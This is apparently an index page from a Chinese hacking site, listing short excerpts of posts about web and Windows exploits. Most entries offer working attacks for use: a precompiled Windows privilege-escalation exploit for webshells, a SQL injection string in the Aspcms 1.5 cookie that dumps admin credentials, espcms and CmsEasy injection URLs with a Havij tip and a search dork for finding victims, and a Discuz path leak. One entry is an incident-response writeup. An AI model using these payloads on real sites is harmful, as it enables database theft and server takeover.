最新提权漏洞 WINDOWS 2003 XP
网上公布的多是本机测试的,不能在SHELL下运行,今天大牛终于放出 可在webshell下使用的了。漏洞代号:MS11-080 MS11-046 源代码大家去安全漏洞数据库找。俺直接上编译好的。 下载:停止下载
Aspcms 1.5 COOKIES 注入漏洞
Aspcms 1.5 COOKIES注入0day,注册一个帐号。然后登陆后修改COOKIES的USERID值 在后面加上注入语句: UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins 然后编辑帐号就能看到管理员的帐号和MD5密码值。 后...
80sec感恩节事件分析
EMail: jianxin#80sec.com Site: http://www.80sec.com Date: 2011-11-30 From: http://www.80sec.com/ [ 目录 ] 0×00 事件背景 0×01 应急响应 0×02 事件分析 0×03 事件启示 0×04 总结 0×00 事件背景 在感恩节的晚上,我们的站点遭遇了攻击,几名未知性别的黑客成功涂改掉了我们的首...
Discuz x2 泄漏服务器物理路径
地址:/source/function/function_connect.php
mysql注入初体验 Root权限下注入及普通用户利用系统表的注入
测试环境为win7sp1+iis7.5+mysql5.1,目标为一个小型phpcms网站,存在注入的地址为http://webshell.cc/show.php?id=2 菜菜我第一次写文章…… 一. Root权限下的mysql注入 直接在网址后面添加引号https://www.webshell.cc/show.php?id=2' 直接爆出为Mysql数据库,使用xor 1=1 xor 1=2确定为...
espcms最新注入0day
上EXP。一步步来。暴出表前缀后,在修改后两句代码里面的表前缀。 爆表前缀: index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from in...
emseasy最新注入漏洞
易通企业网站系统最新注入漏洞。 注入EXP: https://www.webshell.cc/celive/js/include.php?cmseasylive=1111&departmentid=0 直接放Havij里面跑。错误关键字:online.gif 添加表名:cmseasy_user 列表:userid,username,password 百度关键字:Powered by CmsE...